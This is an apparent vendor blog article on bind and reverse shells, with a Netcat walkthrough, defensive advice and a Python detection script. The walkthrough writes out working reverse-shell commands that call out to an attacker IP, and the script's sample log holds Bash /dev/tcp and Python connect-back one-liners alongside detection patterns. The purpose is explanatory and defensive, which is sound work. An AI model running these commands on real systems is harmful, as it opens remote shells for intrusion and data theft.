The recent Log4j vulnerability left several companies reeling as developers and security professionals scrambled to patch systems and mitigate the damage. A recurring feature of the attacks was the use of a reverse shell. A reverse shell is a technique attackers use to turn a remote code execution (RCE) vulnerability into interactive command-line access on the compromised system.

Before we explore reverse shells, we need to establish what a bind shell is.

What is bind shell?

A bind shell is a technique pen testers and attackers use to obtain a command shell on a remote system. It involves two roles: an initiator (client), which opens the connection, and a listener (server), which waits for it.

Let us say the initiator is operated by the attacker and the listener is the target or victim system, which has an RCE vulnerability. In this case, as shown in the image below, the attacker first exploits the RCE to run a payload on the target that binds a shell to a specific port and waits for a connection. The attacker then connects to that port from their own machine. Because the shell is bound to a listening port on the target, this is called a bind shell.

Upon accepting the connection, the target's bound shell reads commands from the connection and writes their output back to the initiator. Through this shell, attackers can run commands on the target, extract data, or gain access to other systems connected to the same network.

Bind shell

While a bind shell is simple enough to set up, it carries some disadvantages for the attacker. An organization can safeguard against bind shells in the following ways:

  • Firewalls: Since a bind shell waits for an inbound connection on a TCP (or, with some tools, UDP) port, a host or network firewall that blocks inbound connections to anything other than the services the system is meant to expose also blocks the attacker from reaching the bound shell.
  • NAT or PAT: Network Address Translation (NAT) and Port Address Translation (PAT) map many private addresses to one or a few public addresses at a router. A bind shell on a target behind NAT listens on a private IP address and port that are not reachable from the internet unless the router has been configured to forward that port to the target, which the attacker cannot usually arrange.

In order to avoid these obstacles, attackers resort to reverse shell.

What is reverse shell?

As the name suggests, in a reverse shell attack the roles are reversed: the attacker operates the listener and the victim acts as the initiator. The attacker first starts a listener on a machine they control, then uses the RCE vulnerability to make the victim system open an outbound connection back to that listener.

Reverse Shell

Once the connection occurs, the victim attaches a shell to it, so commands typed on the listener are executed on the victim and their output is sent back and displayed on the attacker's system. Because the connection is outbound from the victim's point of view, and most firewalls and NAT devices permit outbound connections from internal hosts, a reverse shell sidesteps the obstacles that defeat a bind shell.

How does the connection occur?

Executing a reverse shell attack requires establishing a remote connection between the initiator and the listener. This is often done using the open-source tool Netcat (nc).

Netcat is a popular command-line networking tool for reading from and writing to TCP or UDP connections, for listening on ports, and for simple port scanning. Its versatility has earned it the nickname "the Swiss Army knife of networking," and pen testers and attackers routinely use it to run shell commands on target systems. When Netcat is not present on the target, attackers fall back on whatever interpreter is available there, such as Bash, Python, Perl, or PHP, to write the equivalent connect-back.

Executing a reverse shell attack using NC

  1. Identify an attack vector: To execute a reverse shell attack using nc, the cybercriminal first looks for a possible attack vector. One way to do this is to perform a ping sweep of the target's address range to get a list of live hosts.
  2. Check for connectivity and identify possible vulnerabilities: The next step is to check which of these systems accept connections. Once a reachable service has been found, the cybercriminal looks for vulnerabilities to exploit, for example a web application that passes user input into a system command.
  3. Open a listener on the local system using nc: If the target can be made to run commands and has nc installed, nc can be used to spawn a shell on the target and hand it to the attacker. First, the cybercriminal opens a listener on their own machine with the following command.

    nc -lvp 7879

    Here, nc is Netcat, -l tells it to listen for an incoming connection rather than connect out, -v enables verbose output (which reports the address that connects), and -p sets the local port to listen on. This is followed by the port number, which is the port the victim will be made to connect back to.

  4. Append a command to spawn a shell on the target system: The cybercriminal then injects the following command into the vulnerable ping utility on the target (the web server), telling it to connect back to the attacker's machine.

    nc 198.172.1.100 7879 -e /bin/sh

    Here, the IP address is that of the attacker's listener and 7879 is the port it is listening on, followed by:

    • -e, which tells nc to execute a program and attach its standard input, output, and error to the connection.
    • /bin/sh, the path of the shell to execute.

    Note that -e exists only in some Netcat builds (the traditional netcat and Nmap's ncat, for instance); the OpenBSD netcat shipped with many Linux distributions omits it, which is one reason attackers also use Bash, Python, or Perl one-liners for the connect-back.
  5. Execute commands to gain access or transmit data: The target system runs the command, spawns /bin/sh, and connects it to the attacker's listener. Once the connection is established, the criminal can execute shell commands on the web server to exfiltrate data, or use the foothold to gain access to other systems connected to the network.

Best practices to prevent reverse shell attacks

While remote shell connections are also set up for legitimate administrative purposes, many attackers use them for malicious ends. Once an attacker gains the ability to execute shell commands on a server, they can work toward taking it over and reaching other systems in the network. To prevent this from happening, here are some industry-recommended best practices:

  • Track all outgoing connections over TCP and UDP ports, paying particular attention to servers that initiate connections to addresses they have no business contacting.
  • Strengthen outbound (egress) firewall policies so that servers can reach only the destinations they need; a reverse shell depends on the victim being allowed to connect out.
  • Regularly patch applications and test for command injection vulnerabilities, which are a common way to trigger the connect-back.
  • Frequently monitor network and process activity to weed out suspicious command executions, such as a web server process spawning a shell or Netcat.
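To make the monitoring bullets above concrete, here is an added example (not part of the original article) of the kind of detection logic a SIEM rule would apply to process-creation telemetry that carries the parent process, command line and any outbound network destination. The JSON event lines are constructed for this example, and the field names (host, user, parent, proc, cmdline, dst) are assumptions, not the schema of any particular product. The heuristics look for the patterns described on this page: Netcat invoked with -e or -c, a Bash /dev/tcp redirection, a scripting interpreter that opens a socket and spawns a shell, and a shell spawned by a web or application server process while holding a network connection.

```python
"""Heuristics for spotting reverse shell activity in process telemetry.

Input: one JSON object per line describing a process start, with fields
host, user, parent, proc, cmdline and (when the process opened an outbound
connection) dst. The format and the sample lines are constructed for this
example; adapt the field names to your own telemetry.
"""
import json
import re

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
SERVER_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "java", "tomcat"}
INTERPRETERS = {"python", "python2", "python3", "perl", "php", "ruby"}

# nc / ncat / netcat followed, in the same command, by -e or -c (attach a program to the socket).
NC_EXEC = re.compile(r"\b(?:nc|ncat|netcat)\b[^;|&]*\s-[A-Za-z]*[ec]\b")
# Bash's /dev/tcp and /dev/udp pseudo-devices, used to open a socket without nc.
DEV_SOCKET = re.compile(r"/dev/(?:tcp|udp)/")
# A shell path, as passed to subprocess.call / exec in a scripted connect-back.
SHELL_PATH = re.compile(r"/bin/(?:ba|da)?sh\b")

# Constructed sample events: three reverse shell variants mixed with benign activity.
SAMPLE_LOG = r"""
{"host":"web01","user":"www-data","parent":"apache2","proc":"sh","cmdline":"sh -c 'ping -c 1 10.0.0.5; nc 198.172.1.100 7879 -e /bin/sh'","dst":"198.172.1.100:7879"}
{"host":"web01","user":"root","parent":"cron","proc":"bash","cmdline":"/bin/bash /usr/local/bin/backup.sh"}
{"host":"web02","user":"www-data","parent":"php-fpm","proc":"bash","cmdline":"bash -i >& /dev/tcp/198.172.1.100/4444 0>&1","dst":"198.172.1.100:4444"}
{"host":"app01","user":"tomcat","parent":"java","proc":"python3","cmdline":"python3 -c import socket,os,subprocess;s=socket.socket();s.connect(('198.172.1.100',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])","dst":"198.172.1.100:4444"}
{"host":"web01","user":"alice","parent":"sshd","proc":"bash","cmdline":"-bash"}
{"host":"web01","user":"www-data","parent":"apache2","proc":"ping","cmdline":"ping -c 1 10.0.0.5"}
"""


def classify(event):
    """Return the reasons an event looks like a reverse shell (empty list if benign)."""
    cmd = event.get("cmdline", "")
    proc = event.get("proc", "")
    parent = event.get("parent", "")
    has_connection = "dst" in event
    reasons = []
    if NC_EXEC.search(cmd):
        reasons.append("netcat run with -e/-c: a program is attached to the socket")
    if DEV_SOCKET.search(cmd):
        reasons.append("shell redirection to /dev/tcp or /dev/udp")
    if proc in INTERPRETERS and "socket" in cmd and SHELL_PATH.search(cmd):
        reasons.append("scripting interpreter opens a socket and spawns a shell")
    if proc in SHELLS and parent in SERVER_PARENTS and has_connection:
        reasons.append("shell spawned by a server process while holding a network connection")
    return reasons


def detect(lines):
    """Run classify() over JSON event lines and return one alert per suspicious event."""
    alerts = []
    for index, line in enumerate(lines):
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            alerts.append({
                "index": index,
                "host": event.get("host"),
                "user": event.get("user"),
                "process": f"{event.get('parent')} -> {event.get('proc')}",
                "dst": event.get("dst"),
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.strip().splitlines()):
        print(alert)
```

Run against the constructed sample, the three injected shells (Netcat with -e under apache2, the /dev/tcp one-liner under php-fpm, and the Python connect-back under java) are flagged while the cron job, the SSH login shell, and the legitimate ping are not. The last rule is deliberately the noisiest: a shell that is a direct child of a server process and also owns an outbound socket is rare in normal operation, so it catches variants the string patterns miss, but it should be tuned to the processes your servers actually run.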

A SIEM solution like Log360 continuously monitors network activity, keeps an eye out for suspicious command executions, and regularly ingests logs from vulnerability scanners to ensure you are immediately notified of any loopholes left unattended. To learn more, get in touch with our product experts for a personalized demo. You can also download a free, 30-day trial version here.


© 2021 Zoho Corporation Pvt. Ltd. All rights reserved.